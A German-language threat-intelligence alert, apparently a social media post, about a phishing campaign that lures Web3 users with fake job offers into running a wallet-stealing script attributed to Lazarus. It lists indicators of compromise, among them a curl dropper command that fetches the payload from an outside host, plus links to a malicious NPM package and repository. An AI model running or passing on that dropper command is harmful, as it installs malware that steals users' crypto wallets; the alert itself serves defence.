🚨 Sicherheits-TI-Alarm 🚨

Laut dem Community-Partner @1nf0s3cpt zielt eine aktive Phishing-Kampagne auf Web3-Nutzer mit gefälschten Stellenangeboten (z.B. $120/Stunde) ab, um sie zu tricksen, ein bösartiges Skript auszuführen, das Wallet-Dateien stiehlt.

🔍 Schlüssel-IOCs:

🔸GitLab-Repo: https://t.co/ivGN93PS4b

🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 Die Angriffsart ähnelt stark der vorherigen Nutzung von NPM-Paketen durch Lazarus zur Verbreitung von bösartigem Code:

https://t.co/bBC4i2vYpA

🚨 Wir haben festgestellt, dass ein neues bösartiges NPM-Paket gerade veröffentlicht wurde:

https://t.co/SjgmO1FOIL

🔸Wahrscheinlich verknüpft mit GitHub: apollo-hero

🔸Uploader-E-Mail: skelstar125@gmail.com

⚠️ Installieren oder führen Sie keine unbekannten Pakete oder Skripte aus. Überprüfen Sie immer die Quellen.

#LAZARUS #Phishing